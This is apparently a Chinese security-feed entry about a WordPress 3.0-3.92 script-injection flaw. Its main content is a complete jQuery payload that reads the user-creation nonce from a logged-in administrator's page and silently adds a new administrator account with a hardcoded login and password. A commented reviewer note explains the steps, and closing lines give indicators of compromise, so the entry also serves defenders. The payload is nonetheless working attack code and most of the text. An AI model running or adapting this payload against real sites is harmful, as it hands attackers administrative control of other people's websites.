WordPress 3.0-3.92 administrator-adding payload - vulnerability warning - the black bar safety net

2014-12-08T00:00:00
ID MYHACK58:62201456708
Type myhack58
Reporter 佚名
Modified 2014-12-08T00:00:00

Description

> /*
>  * Reviewer note: a defensive reading of the snippet below.
>  *
>  * What the code does:
>  *   1. Builds xurl by replacing the last path segment of the current page
>  *      URL with "user-new.php".
>  *   2. GETs that page as HTML and reads the value of the hidden field
>  *      input#_wpnonce_create-user from the response.
>  *   3. POSTs to the same URL with action=createuser, the nonce it just read,
>  *      and role=administrator, then logs 'ok'. The 'error' log and the empty
>  *      always() handler are attached to the outer GET only.
>  *
>  * Because xurl is derived from location.href and the requests carry no
>  * credentials of their own, the script presumably has to run inside a
>  * logged-in administrator's wp-admin page (the page title points to a
>  * script-injection issue in WordPress 3.0-3.92; confirm against the original
>  * advisory). The nonce is no barrier here: it protects against cross-site
>  * requests, but same-origin script can read it straight out of the form.
>  *
>  * What to look for: administrator accounts nobody created (this sample uses
>  * login 0x_Jin and e-mail root@xss1.com), and access-log entries where one
>  * session GETs user-new.php and POSTs to it immediately afterwards.
>  *
>  * The spaces after dots ("location. href", 'www. xss1.com') look like
>  * extraction damage; the text is reproduced unchanged.
>  */
> var a = location. href. split('/'); var xurl = location. href. replace(a[a. length-1],"user-new.php"); jQuery. ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) . done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp. find('input#_wpnonce_create-user'). each(function(i,o){ var o=jQuery(o); Xtoken=o. attr('value'); }); jQuery. ajax({ url: xurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'0x_Jin','email':'root@xss1.com','first_name':'0x_Jin','last_name':'0x_Jin','url':'www. xss1.com','pass1':'fuckxssQ','pass2':'fuckxssQ','role':'administrator','createuser':'Add+New+User+'} }) . done(function(){ console. log('ok'); return; }) }) . fail(function() { console. log("error"); }) . always(function() { return; });

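Account created by the payload: login 0x_Jin, password fuckxssQ. An administrator with this login (or the e-mail root@xss1.com) that nobody on the site created indicates the payload has run.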

!